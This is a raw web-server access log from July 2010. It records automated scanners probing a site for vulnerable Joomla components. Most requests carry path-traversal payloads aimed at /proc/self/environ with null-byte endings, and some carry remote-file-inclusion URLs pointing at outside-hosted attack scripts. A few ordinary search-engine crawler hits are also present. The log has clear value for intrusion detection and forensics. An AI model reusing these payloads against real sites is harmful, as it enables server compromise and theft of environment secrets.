92.43.201.28 - - [27/Jul/2010:11:23:23 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:23:23 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:24:01 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:24:01 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:27:10 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:27:10 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
94.23.215.207 - - [27/Jul/2010:11:28:41 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:42 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:55 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:55 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:29:03 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:29:03 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:29:14 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:29:14 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:29:29 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:29:29 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
76.242.100.234 - - [27/Jul/2010:11:29:53 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
202.47.80.12 - - [27/Jul/2010:11:30:23 +0200] "GET /logs/access_log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:30:29 +0200] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:30:34 +0200] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
76.242.100.234 - - [27/Jul/2010:11:30:53 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:30:53 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:31:12 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:31:12 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:31:25 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:31:25 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:32:07 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:32:07 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:33:38 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:33:43 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
202.47.80.12 - - [27/Jul/2010:11:35:08 +0200] "GET /logs/access_log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:35:14 +0200] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:11:35:20 +0200] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
76.242.100.234 - - [27/Jul/2010:11:37:49 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:37:54 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:38:13 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:38:19 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
188.165.217.175 - - [27/Jul/2010:11:40:01 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
188.165.217.175 - - [27/Jul/2010:11:40:01 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:40:04 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:40:04 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:11:40:11 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:11:40:11 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
91.121.141.186 - - [27/Jul/2010:11:40:17 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:40:17 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:11:40:49 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:11:40:49 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
91.121.141.186 - - [27/Jul/2010:11:40:55 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:11:40:56 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.165.217.175 - - [27/Jul/2010:11:41:07 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
188.165.217.175 - - [27/Jul/2010:11:41:07 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
98.130.2.13 - - [27/Jul/2010:12:08:22 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:12:08:22 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:12:08:27 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
66.249.71.169 - - [27/Jul/2010:12:16:43 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.169 - - [27/Jul/2010:12:16:43 +0200] "GET /logs/ HTTP/1.1" 200 796 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.112.178 - - [27/Jul/2010:12:22:23 +0200] "GET /?C=S;O=A HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.186.81.78 - - [27/Jul/2010:12:23:33 +0200] "GET //index.php?option=com_joomlapicasa2&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
195.186.81.78 - - [27/Jul/2010:12:23:33 +0200] "GET /logs/access_log%20%20//index.php?option=com_joomlapicasa2&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
195.186.81.78 - - [27/Jul/2010:12:23:33 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
195.186.81.78 - - [27/Jul/2010:12:24:04 +0200] "GET /logs/access_log//index.php?option=com_joomlapicasa2&controller=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
193.138.125.55 - - [27/Jul/2010:13:00:01 +0200] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:14:39 +0200] "GET /logs/access_log/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:14:39 +0200] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:14:40 +0200] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
67.195.112.178 - - [27/Jul/2010:13:17:13 +0200] "GET /logs/access_log HTTP/1.0" 200 362835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.240.147 - - [27/Jul/2010:13:26:03 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
121.78.118.123 - - [27/Jul/2010:13:26:19 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:13:31:12 +0200] "GET /logs/access_log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:13:31:13 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:13:31:14 +0200] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:13:32:03 +0200] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
188.165.213.8 - - [27/Jul/2010:13:34:07 +0200] "GET /index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
82.141.136.11 - - [27/Jul/2010:13:37:23 +0200] "GET /logs/error_log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
82.141.136.11 - - [27/Jul/2010:13:37:24 +0200] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 339 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
82.141.136.11 - - [27/Jul/2010:13:37:24 +0200] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
82.141.136.11 - - [27/Jul/2010:13:38:17 +0200] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 344 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
82.141.136.11 - - [27/Jul/2010:13:38:17 +0200] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 339 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
82.141.136.11 - - [27/Jul/2010:13:38:17 +0200] "GET /logs/error_log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 354 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
174.121.240.147 - - [27/Jul/2010:13:38:19 +0200] "GET /logs/access_log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:38:19 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:38:20 +0200] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
121.78.118.123 - - [27/Jul/2010:13:39:49 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:13:41:09 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
207.46.204.179 - - [27/Jul/2010:13:43:17 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.240.147 - - [27/Jul/2010:13:43:49 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:44:24 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
207.46.204.179 - - [27/Jul/2010:13:44:34 +0200] "GET /?C=S;O=A HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.215.207 - - [27/Jul/2010:13:49:03 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:03 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:12 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:12 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
76.70.7.48 - - [27/Jul/2010:13:54:06 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.79"
76.70.7.48 - - [27/Jul/2010:13:54:06 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
76.70.7.48 - - [27/Jul/2010:13:54:06 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.79"
174.121.240.147 - - [27/Jul/2010:13:54:40 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:54:40 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:13:54:40 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
213.145.228.170 - - [27/Jul/2010:13:55:41 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
189.21.153.139 - - [27/Jul/2010:13:57:06 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
213.145.228.170 - - [27/Jul/2010:13:59:22 +0200] "GET /logs/access_log/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:13:59:22 +0200] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:13:59:22 +0200] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
83.165.195.143 - - [27/Jul/2010:14:03:54 +0200] "GET /logs/access_log HTTP/1.0" 200 370995 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
174.121.240.147 - - [27/Jul/2010:14:06:47 +0200] "GET /////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
189.21.153.139 - - [27/Jul/2010:14:11:05 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.810"
189.21.153.139 - - [27/Jul/2010:14:11:06 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
189.21.153.139 - - [27/Jul/2010:14:11:06 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:14:18:39 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:14:18:39 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
217.65.2.151 - - [27/Jul/2010:14:19:02 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
84.217.73.155 - - [27/Jul/2010:14:19:20 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
91.121.67.226 - - [27/Jul/2010:14:19:20 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:14:19:21 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:14:19:30 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:14:19:30 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.808"
78.41.233.128 - - [27/Jul/2010:14:19:43 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:14:19:43 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
174.121.192.28 - - [27/Jul/2010:14:20:52 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:14:20:53 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
72.55.153.180 - - [27/Jul/2010:14:20:54 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:20:55 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
91.121.67.226 - - [27/Jul/2010:14:20:56 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:14:20:56 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
99.198.108.74 - - [27/Jul/2010:14:20:58 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
72.55.153.180 - - [27/Jul/2010:14:20:59 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
99.198.108.74 - - [27/Jul/2010:14:21:03 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
217.65.2.151 - - [27/Jul/2010:14:21:10 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:21:10 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:21:10 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.836"
82.79.52.157 - - [27/Jul/2010:14:21:12 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
82.79.52.157 - - [27/Jul/2010:14:21:13 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:14:21:21 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:14:21:21 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
84.217.73.155 - - [27/Jul/2010:14:21:30 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
